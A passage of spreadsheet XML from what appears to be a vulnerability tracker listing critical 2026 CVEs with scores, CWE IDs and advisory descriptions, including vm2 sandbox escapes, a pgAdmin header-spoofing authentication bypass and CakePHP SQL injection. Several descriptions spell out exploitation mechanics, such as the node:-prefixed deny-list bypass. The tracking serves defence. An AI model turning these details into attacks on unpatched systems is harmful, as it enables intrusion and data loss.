          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-114</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>vm2 3.11.3 through 3.11.6 exposes the host Node.js crypto module to a NodeVM sandbox when the crypto builtin is allowed. The module is presented via a recursive read-only proxy, but its callable exports still execute with host-process authority. Sandboxed JavaScript can therefore call crypto.setEngine() with a filesystem path to an attacker-supplied native library (for example, one bundled in an untrusted plugin package already written to disk); OpenSSL asks the operating-system dynamic loader to load the file, and the library's constructor executes native code in the host process before engine-symbol validation rejects it. Exploitation requires only the crypto builtin and does not require fs, process, module, child_process, worker_threads, vm, or inspector access, resulting in a sandbox escape and arbitrary native code execution. Fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92939</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92951</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains an incorrect authorization vulnerability in the external package allowlist check that uses non-exact substring matching instead of full package-name boundary validation. Attackers can bypass the allowlist by requiring a colliding package name that contains an allowlisted package substring, causing vm2 to load and execute unauthorized host packages in the host context.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92951</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92957</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>vm2 through 3.11.6 does not normalize `node:`-prefixed builtin specifiers when evaluating user-supplied negative (deny) entries in a NodeVM wildcard require policy. Although NodeVM strips the `node:` prefix during require() resolution, negative wildcard entries are matched by exact string comparison against the canonical builtin names, so a policy such as `new NodeVM({ require: { builtin: ['*', '-node:child_process'] } })` fails to deny the canonical `child_process` module. Sandboxed code can therefore obtain the host `child_process` builtin via `require('child_process')` or `require('node:child_process')`, gaining references to process-spawning APIs such as execSync and spawn, which is equivalent to host command-execution capability for untrusted sandbox code. Fixed in vm2 3.11.7. (Suggested title: "vm2 before 3.11.7: NodeVM builtin deny-list bypass via node:-prefixed specifiers exposes child_process")</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92957</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54237</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-94</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Wavelog is web-based amateur radio logging software. From 1.8 until 2.4.2, Wavelog exposes /install/ajax.php and /install/includes/interface_assets/triggers.php after installation without an installation lock or permission check. Unsanitized input reaches write_config() and write_configfile() in install/includes/core/core_class.php, allowing a remote unauthenticated attacker to read or write log files and place attacker-controlled content into PHP configuration files. The resulting PHP configuration content can execute on the server. This issue is fixed in version 2.4.2.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54237</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70009</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70009</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86863</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-807</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Webserver authentication source is intended to accept an identity asserted by the web server or reverse proxy in front of pgAdmin, delivered through the WSGI/CGI environment. WebserverAuthentication.get_user() read config.WEBSERVER_REMOTE_USER from request.environ and, when that returned nothing, fell back to reading the same name directly from the inbound HTTP request headers via request.headers.get(). An inbound HTTP header is written by whoever sends the request, so any client able to reach pgAdmin could supply that header itself and be authenticated as any username it named, including an existing Administrator, without presenting a password or any other credential. The environment lookup could also be satisfied by a client-supplied header whenever WEBSERVER_REMOTE_USER was configured to an HTTP_-prefixed or hyphenated name such as HTTP_X_FORWARDED_USER or X-Forwarded-User, since WSGI servers place inbound headers into the environment under exactly those names. Deployments are affected only when 'webserver' is enabled in AUTHENTICATION_SOURCES.
The fix distinguishes a genuine CGI/WSGI variable from a header-derived one and implicitly trusts only the former. A header-asserted identity is now accepted only when the operator explicitly opts in via WEBSERVER_REMOTE_USER_FROM_HEADER, the request arrives from a peer listed in WEBSERVER_TRUSTED_PROXIES, and, when configured, a shared secret supplied in WEBSERVER_SHARED_SECRET_HEADER matches WEBSERVER_SHARED_SECRET under a constant-time comparison. The trusted-peer check deliberately reads the real socket peer address rather than request.remote_addr, because ProxyFix rewrites the latter from the client-controlled X-Forwarded-For header and would otherwise allow an attacker to claim to be the trusted proxy. As defence in depth, login() now refuses any account whose auth_source is not 'webserver', so a misconfigured trust gate cannot be used to assume an internal or LDAP account.
This issue affects pgAdmin 4: from 6.2 before 9.18.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86863</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92950</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-453</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a sandbox escape vulnerability in the CLI tool that allows attackers to execute arbitrary code in the host Node.js process. Attackers can supply a malicious script file to the vm2 CLI that uses require(__filename) to re-execute itself in the host realm, bypassing sandbox isolation and accessing host modules like fs and child_process.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92950</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15688</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>Mitsubishielectric.Psirt@yd.MitsubishiElectric.co.jp</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Incorrect Implementation of Authentication Algorithm Vulnerability in Mitsubishi Electric GX Works3 and Motion Control Setting allows a local attacker to successfully authenticate even with an invalid block password by executing the affected product and modifying part of the executable module in memory, and thereby may be able to view, tamper with, destroy, or delete control programs.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15688</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79752</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>composer:cakephp/cakephp, composer:cakephp/database</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr">
        <is>
          <t>4.5.12, 4.6.5, 5.1.9, 5.2.14, 5.3.7</t>
        </is>
      </c>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7, FunctionsBuilder::cast, FunctionsBuilder::extract, FunctionsBuilder::datePart, and FunctionsBuilder::dateAdd in src/Database/FunctionsBuilder.php accept user-controlled dataType, part, or unit values and incorporate them into generated SQL as unescaped structural fragments. An application that passes untrusted input to these parameters can permit SQL injection with confidentiality, integrity, and availability impact according to the database connection's privileges. This issue is fixed in versions 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79752</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92943</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Improper validation of certificate with host mismatch in the MQTT client TLS connection layer in AWS IoT Device SDK for Python 1.5.3 through 1.6.0 on Python 3.7 and later might allow an adversary-in-the-middle actor to impersonate the AWS IoT Core endpoint, read device telemetry, and inject arbitrary MQTT messages that the device processes as authentic, via a certificate issued for an unrelated hostname by a certificate authority present in the device trust store.
To remediate this issue, users should upgrade to version 1.6.1.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92943</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93393</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow exists in the TLS transport layer of the MongoDB C Driver when built with the Windows platform TLS backend. A remote endpoint that the client connects to, or an attacker able to impersonate or redirect the client's connection, can cause the driver to write attacker-supplied data outside the bounds of a heap allocation while processing incoming encrypted traffic. No authentication or user interaction is required, because the affected processing occurs before any application-level authentication completes. Successful exploitation may lead to memory corruption in the client process, disclosure of adjacent heap memory, or termination of the process.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93393</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54670</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-306</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, the contribution request dispatcher in web/html/contribuicao/controller/control.php accepts attacker-controlled nomeClasse and metodo values without a complete controller and method allowlist, exempts sensitive ContribuicaoLogController operations from authentication, and constructs a controller include path without canonical directory containment. An unauthenticated remote attacker can invoke getContribuicoesLogJSON, sincronizarStatus, registrarFaturas, and other sensitive methods to disclose contribution and donation records or trigger financial workflow operations. A traversal-shaped nomeClasse value can also cause require_once to include an accessible PHP or configuration file outside the intended controller directory, exposing source code, credentials, or other sensitive local data. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54670</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54767</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, web/html/socio/sistema/controller/deletar_socios.php exposes an unauthenticated GET endpoint whose chave parameter is checked only against a hardcoded chave_correta value embedded in the public source repository. A remote attacker who obtains that value can reach the endpoint's TRUNCATE TABLE operations for the endereco, pessoafisica, pessoajuridica, and socio tables without an administrative session or application authorization, permanently destroying member and contributor records. The attack requires the affected tables to exist and the web process database account to possess truncation privileges. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54767</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63472</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/core</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr">
        <is>
          <t>3.7.0</t>
        </is>
      </c>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.7.0, ExternalAuthenticationService.createCustomerAndUser in packages/core/src/service/helpers/external-authentication/external-authentication.service.ts selects an existing customer user by emailAddress and attaches a newly presented ExternalAuthenticationMethod without requiring verified to be true. In deployments with a custom external AuthenticationStrategy that forwards an email whose ownership the provider has not verified, an attacker can authenticate with a victim's email and bind the attacker's external identity to the victim's existing account. This can expose orders, addresses, and personal information and permit account changes or orders as the victim. Native-only email and password deployments and external strategies that always require provider-verified email ownership are unaffected, and new-account creation for an unused email remains permitted. This issue is fixed in version 3.7.0.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63472</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76949</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
